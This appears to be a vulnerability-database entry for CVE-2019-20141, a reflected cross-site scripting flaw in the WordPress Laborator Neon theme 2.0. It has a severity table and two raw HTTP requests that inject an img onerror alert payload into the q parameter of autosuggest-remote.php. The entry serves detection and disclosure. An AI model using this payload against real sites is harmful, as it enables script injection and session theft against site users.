| Title | WordPress Laborator Neon Theme 2.0 - Cross-Site Scripting |
|---|---|
| Author | knassar702 |
| Severity | Medium |
| Impact | Attackers can execute arbitrary JavaScript in victims' browsers, potentially stealing session cookies, credentials, or performing administrative actions on behalf of users. |
| Remediation | Apply the latest security patch or update provided by the theme developer to fix the XSS vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.12494 |
| CVE ID | CVE-2019-20141 |
| CWE ID | CWE-79 |
| Tags | cve2019 cve xss laborator wordpress vuln |
WordPress Laborator Neon theme 2.0 contains a cross-site scripting vulnerability via the data/autosuggest-remote.php q parameter.
GET /data/autosuggest-remote.php?q="><img%20src=x%20onerror=alert(1)> HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /admin/data/autosuggest-remote.php?q="><img%20src=x%20onerror=alert(1)> HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-20141.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-20141.pcap
N/AN/A